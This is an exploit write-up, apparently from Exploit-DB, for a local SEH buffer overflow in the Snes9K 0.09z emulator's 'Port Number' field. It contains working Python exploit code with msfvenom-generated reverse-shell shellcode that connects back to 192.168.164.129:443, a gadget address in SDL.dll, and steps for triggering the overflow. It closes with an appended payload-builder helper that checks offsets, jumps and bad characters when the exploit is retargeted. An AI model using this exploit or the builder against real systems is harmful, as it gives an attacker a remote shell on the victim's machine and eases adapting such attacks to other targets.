[local] Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)

# Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)
# Date: 2020-07-20
# Exploit Author: MasterVlad
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip
# Version: 0.09z
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:
# 1. Run the Python script
# 2. Open exploit.txt and copy the content to the clipboard
# 3. Open Snes9K 0.09z
# 4. Click on Netplay -> Connect to Server
# 5. Paste the clipboard into the "Port Number" field
# 6. Click on Connect and then on OK

#!/usr/bin/python
# Shellcode generated with:
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py
# (351 bytes, encoded to avoid the bad characters \x00, \x0a and \x0d)
buf = b""
buf += b"\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f"
buf += b"\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71"
buf += b"\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9"
buf += b"\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4"
buf += b"\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93"
buf += b"\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8"
buf += b"\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b"
buf += b"\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6"
buf += b"\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28"
buf += b"\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d"
buf += b"\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f"
buf += b"\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8"
buf += b"\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86"
buf += b"\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83"
buf += b"\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0"
buf += b"\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3"
buf += b"\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79"
buf += b"\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde"
buf += b"\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7"
buf += b"\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2"
buf += b"\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8"
buf += b"\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd"
buf += b"\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72"
buf += b"\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05"
buf += b"\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c"
buf += b"\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1"

# Buffer layout: 420 bytes of filler, then the SEH record (nSEH + handler),
# then a sled up to the shellcode; 2000 bytes in total.
exploit = b"A" * 420                           # filler up to the SEH record
exploit += b"\x74\x06\x75\x04"                 # nSEH: je +6 / jne +4, both land just past the handler
exploit += b"\x40\x51\x01\x10"                 # SEH: 0x10015140 pop pop ret; SDL.dll
exploit += b"\x41" * (2000 - 428 - len(buf))   # sled (0x41 = inc ecx) up to the shellcode
exploit += buf

# Written in binary mode so the shellcode bytes reach the file unchanged.
with open("exploit.txt", "wb") as f:
    f.write(exploit)
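The following helper is an added example, not part of MasterVlad's PoC. It rebuilds the same SEH-overwrite layout (420 bytes of filler, a 4-byte nSEH, a 4-byte handler address, a sled, then the shellcode, 2000 bytes in total) and performs the checks that usually break silently when a PoC like this is retargeted: the handler address must be packed little-endian, both branches of the nSEH jump pair must land just past the SEH record, the total length must match what the field accepts, and no byte may fall in the bad-character set given to msfvenom. The offsets, the 0x10015140 gadget and the bad characters are taken from the PoC above; the shellcode is a constructed NOP/int3 stub, not a real payload.

```python
#!/usr/bin/env python3
"""SEH-overwrite payload builder with retargeting checks (added example)."""
import struct

# Bad characters from the msfvenom command in the PoC above.
BADCHARS = b"\x00\x0a\x0d"

# nSEH used by the PoC: 74 06 = je +6, 75 04 = jne +4. Whatever the zero
# flag holds when POP/POP/RET returns into nSEH, execution lands 8 bytes
# further on, i.e. right after the overwritten handler address.
NSEH_JUMP = b"\x74\x06\x75\x04"


def short_jump_targets(nseh):
    """Landing offsets (relative to the start of nSEH) of the two rel8 jumps.

    A rel8 jump's target is the address of the next instruction plus the
    signed 8-bit displacement that follows the opcode."""
    first = 2 + struct.unpack("<b", nseh[1:2])[0]   # jcc at +0, next insn at +2
    second = 4 + struct.unpack("<b", nseh[3:4])[0]  # jcc at +2, next insn at +4
    return first, second


def find_badchars(data, badchars=BADCHARS):
    """Sorted list of bad-character values that occur anywhere in data."""
    return sorted({b for b in data if b in badchars})


def build_seh_payload(offset, ppr_addr, shellcode, total_len,
                      nseh=NSEH_JUMP, badchars=BADCHARS):
    """Assemble filler | nSEH | SEH | sled | shellcode and validate it.

    offset    : bytes of filler before the SEH record (420 in the PoC)
    ppr_addr  : address of a POP/POP/RET gadget (0x10015140 in SDL.dll)
    shellcode : bytes placed at the very end of the buffer
    total_len : bytes the vulnerable field accepts (2000 in the PoC)
    """
    if short_jump_targets(nseh) != (8, 8):
        raise ValueError("nSEH jumps do not both land just past the SEH record")
    seh = struct.pack("<I", ppr_addr)              # little-endian, as the CPU reads it
    head = b"A" * offset + nseh + seh
    sled_len = total_len - len(head) - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode does not fit in %d bytes" % total_len)
    payload = head + b"\x41" * sled_len + shellcode   # 0x41 = inc ecx, a harmless sled
    bad = find_badchars(payload, badchars)
    if bad:
        raise ValueError("bad characters present: %r" % bad)
    return payload


# Constructed placeholder: four NOPs and an int3, so a debugger stops on the
# first byte of "shellcode" once the SEH chain is taken. Not a real payload.
STUB = b"\x90\x90\x90\x90\xcc"


def build_poc_payload():
    """Payload using the offsets and gadget address from the PoC above."""
    return build_seh_payload(420, 0x10015140, STUB, 2000)


if __name__ == "__main__":
    payload = build_poc_payload()
    handler = struct.unpack("<I", payload[424:428])[0]
    print("length: %d" % len(payload))
    print("nSEH:   %s" % payload[420:424].hex())
    print("SEH:    %s -> 0x%08x" % (payload[424:428].hex(), handler))
    with open("exploit.txt", "wb") as f:
        f.write(payload)
```

When swapping in a different gadget, run the builder first: an address such as 0x10010a00 would pack to bytes containing \x00 and \x0a and is rejected before anything reaches the target, which is cheaper than debugging a silently truncated buffer.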